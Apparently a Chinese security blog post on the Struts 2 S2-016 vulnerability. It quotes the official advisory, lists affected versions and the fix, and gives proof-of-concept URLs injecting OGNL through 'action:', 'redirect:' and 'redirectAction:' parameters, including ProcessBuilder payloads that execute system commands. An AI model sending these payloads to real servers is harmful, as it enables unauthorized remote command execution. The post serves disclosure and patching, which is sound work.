- A+
显示不全请点击全屏阅读
这是一个代码执行漏洞,利用java代码来执行系统命令。
影响版本:Struts 2.0.0 – Struts 2.3.15
漏洞说明:
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
测试POC:
In the Struts Blank App, open following URLs.
-
Simple Expression – the parameter names are evaluated as OGNL.
-
http://host/struts2-blank/example/X.action?action:%25{3*4}
-
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
-
-
Command Execution
-
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}
-
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}
-
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command’,’goes’,’here’})).start()}
-
解决方法:
DefaultActionMapper was changed to sanitize “action:”-prefixed information properly. The features involved with “redirect:”/”redirectAction:”-prefixed parameters were completely dropped – see also S2-017.
官方说明:http://struts.apache.org/release/2.3.x/docs/s2-016.html
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱
也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡
